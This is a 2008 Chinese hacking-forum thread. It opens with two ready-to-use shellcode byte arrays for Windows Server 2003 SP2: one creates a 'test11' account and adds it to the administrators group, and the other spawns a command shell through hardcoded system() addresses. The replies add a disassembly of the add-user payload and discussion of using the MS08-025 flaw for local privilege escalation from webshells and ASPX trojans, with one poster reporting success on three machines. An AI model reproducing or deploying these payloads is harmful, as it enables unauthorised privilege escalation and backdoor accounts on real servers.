文章作者：pt007[at]vip.sina.com
信息来源：邪恶八进制信息安全团队(www.eviloctal.com)

注：文章首发I.S.T.O信息安全团队，后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有，转载需注明作者。
1、//win2003+sp2下加入一个test11/Test11!!!管理员用户的shellcode:
unsigned char shellcode[]=
"\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x24"
"\xC6\x45\xDC\x6E\xC6\x45\xDD\x65\xC6\x45\xDE\x74\xC6\x45\xDF\x20\xC6\x45\xE0\x0D\xC6\x45\xE1\x75\xC6\x45\xE2\x73\xC6\x45\xE3\x65\xC6\x45\xE4\x72\xC6\x45\xE5\x20\xC6\x45\xE6\x0D\xC6\x45\xE7\x74\xC6\x45\xE8\x65\xC6\x45\xE9\x73\xC6\x45\xEA\x74\xC6\x45\xEB\x31\xC6\x45\xEC\x31\xC6\x45\xED\x20\xC6\x45\xEE\x0D\xC6\x45\xEF\x54\xC6\x45\xF0\x65\xC6\x45\xF1\x73\xC6\x45\xF2\x74\xC6\x45\xF3\x31\xC6\x45\xF4\x31\xC6\x45\xF5\x21\xC6\x45\xF6\x21\xC6\x45\xF7\x21\xC6\x45\xF8\x20\xC6\x45\xF9\x0D\xC6\x45\xFA\x2F\xC6\x45\xFB\x61\xC6\x45\xFC\x64\xC6\x45\xFD\x64\x8D\x45\xDC\x50\xB8\x83\xA0\xB8\x77\xFF\xD0"
"\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x34"
"\xC6\x45\xCC\x6E\xC6\x45\xCD\x65\xC6\x45\xCE\x74\xC6\x45\xCF\x20\xC6\x45\xD0\x0D\xC6\x45\xD1\x6C\xC6\x45\xD2\x6F\xC6\x45\xD3\x63\xC6\x45\xD4\x61\xC6\x45\xD5\x6C\xC6\x45\xD6\x67\xC6\x45\xD7\x72\xC6\x45\xD8\x6F\xC6\x45\xD9\x75\xC6\x45\xDA\x70\xC6\x45\xDB\x20\xC6\x45\xDC\x0D\xC6\x45\xDD\x61\xC6\x45\xDE\x64\xC6\x45\xDF\x6D\xC6\x45\xE0\x69\xC6\x45\xE1\x6E\xC6\x45\xE2\x69\xC6\x45\xE3\x73\xC6\x45\xE4\x74\xC6\x45\xE5\x72\xC6\x45\xE6\x61\xC6\x45\xE7\x74\xC6\x45\xE8\x6F\xC6\x45\xE9\x72\xC6\x45\xEA\x73\xC6\x45\xEB\x20\xC6\x45\xEC\x0D\xC6\x45\xED\x74\xC6\x45\xEE\x65\xC6\x45\xEF\x73\xC6\x45\xF0\x74\xC6\x45\xF1\x31\xC6\x45\xF2\x31\xC6\x45\xF3\x20\xC6\x45\xF4\x0D\xC6\x45\xF5\x2F\xC6\x45\xF6\x61\xC6\x45\xF7\x64\xC6\x45\xF8\x64"
"\x8D\x45\xCC\x50\xB8\x83\xA0\xB8\x77\xFF\xD0";

2、/* 以下shellcode将开启一个command.com for win2k3+sp2 */
"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
"\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6"
"\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA"
"\xc6\x1d\x80\x7c"  //2003 sp2上LoadLibraryA地址:0x7C801DC6
"\x52\x8D\x45\xF4\x50"
"\xFF\x55\xF0"
"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2E"
"\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4"
"\x50\xB8"
"\x83\xa0\xb8\x77"  //2003 sp1和sp2上system地址:0x77b8a083
"\xFF\xD0";

[ 本帖最后由 pt007 于 2008-4-29 22:00 编辑 ]

是自己劳动的成果，发不发出来是一回事，是不是对每个人都有意义那是另外一回事!
如果楼主再贴上函数源代码就更好了

没有源码,我手动提取的

push 栈 然后system调用，目测是这样，嘿嘿
没用还工具转换

push    ebp
  mov     ebp, esp
  xor     edi, edi
  push    edi
  sub     esp, 24
  mov     byte ptr [ebp-24], 6E
  mov     byte ptr [ebp-23], 65
  mov     byte ptr [ebp-22], 74
  mov     byte ptr [ebp-21], 20
  mov     byte ptr [ebp-20], 0D
  mov     byte ptr [ebp-1F], 75
  mov     byte ptr [ebp-1E], 73
  mov     byte ptr [ebp-1D], 65
  mov     byte ptr [ebp-1C], 72
  mov     byte ptr [ebp-1B], 20
  mov     byte ptr [ebp-1A], 0D
  mov     byte ptr [ebp-19], 74
  mov     byte ptr [ebp-18], 65
  mov     byte ptr [ebp-17], 73
  mov     byte ptr [ebp-16], 74
  mov     byte ptr [ebp-15], 31
  mov     byte ptr [ebp-14], 31
  mov     byte ptr [ebp-13], 20
  mov     byte ptr [ebp-12], 0D
  mov     byte ptr [ebp-11], 54
  mov     byte ptr [ebp-10], 65
  mov     byte ptr [ebp-F], 73
  mov     byte ptr [ebp-E], 74
  mov     byte ptr [ebp-D], 31
  mov     byte ptr [ebp-C], 31
  mov     byte ptr [ebp-B], 21
  mov     byte ptr [ebp-A], 21
  mov     byte ptr [ebp-9], 21
  mov     byte ptr [ebp-8], 20
  mov     byte ptr [ebp-7], 0D
  mov     byte ptr [ebp-6], 2F
  mov     byte ptr [ebp-5], 61
  mov     byte ptr [ebp-4], 64
  mov     byte ptr [ebp-3], 64
  lea     eax, dword ptr [ebp-24]
  push    eax
  mov     eax, 77B8A083
  call    eax


硬编码...我无语了...
还有 mov...... 更无语...
call @F
db 'net user /add ..........'
@@:
用这个吧

  不通用，不通用。。。。

感谢楼主的共享。
不过ms08025不能用在webshell提权中。。作用大幅度地减小了。
"An attacker must have valid logon credentials and be able to log on locally to a vulnerable system in order to exploit this vulnerability. The vulnerability could not be exploited remotely or by anonymous users."

[ 本帖最后由 taiwansee 于 2008-5-2 20:23 编辑 ]

08025的利用似乎需要发送消息?
所以WEBSHELL下无法使用吧

引用:

原帖由 sunwear 于 2008-5-3 09:36 发表
08025的利用似乎需要发送消息?
所以WEBSHELL下无法使用吧

可以在.net shell里面成功进行本地提权,我测试成功了三台.

不在WEBSHELL下  应该还是有方法的呀!

可以在.net shell里面成功进行本地提权,我测试成功了三台.
意思是在ASPX马里可以执行08025利用程序来添加用户？

我在Windows Server 2003 Enterprise SP2上，用aspx马测试失败。

另：
“可以在.net shell里面成功进行本地提权,我测试成功了三台.”中的“.net shell”到底是怎么样的shell呢？“本地提权”又是怎么回事？

请楼主指教。

引用:

原帖由 洋洋洒洒 于 2008-5-1 23:42 发表
push    ebp
  mov     ebp, esp
  xor     edi, edi
  push    edi
  sub     esp, 24
  mov     byte ptr [ebp-24], 6E
  mov     byte ptr [ebp-23], 65
  mov     byte ptr [ebp-22], 74
  mov     byte ptr [eb ...

能说说你是怎么得到ASM源码的?

直接把机器码整理一下格式 往od里贴上去就得到了...

请问I.S.T.O网址在哪啊?

引用:

原帖由 洋洋洒洒 于 2008-5-5 13:03 发表
直接把机器码整理一下格式 往od里贴上去就得到了...

请问I.S.T.O网址在哪啊?

http://blog.csdn.net/I_S_T_O/  欢迎指教:)

[ 本帖最后由 pt007 于 2008-5-6 11:01 编辑 ]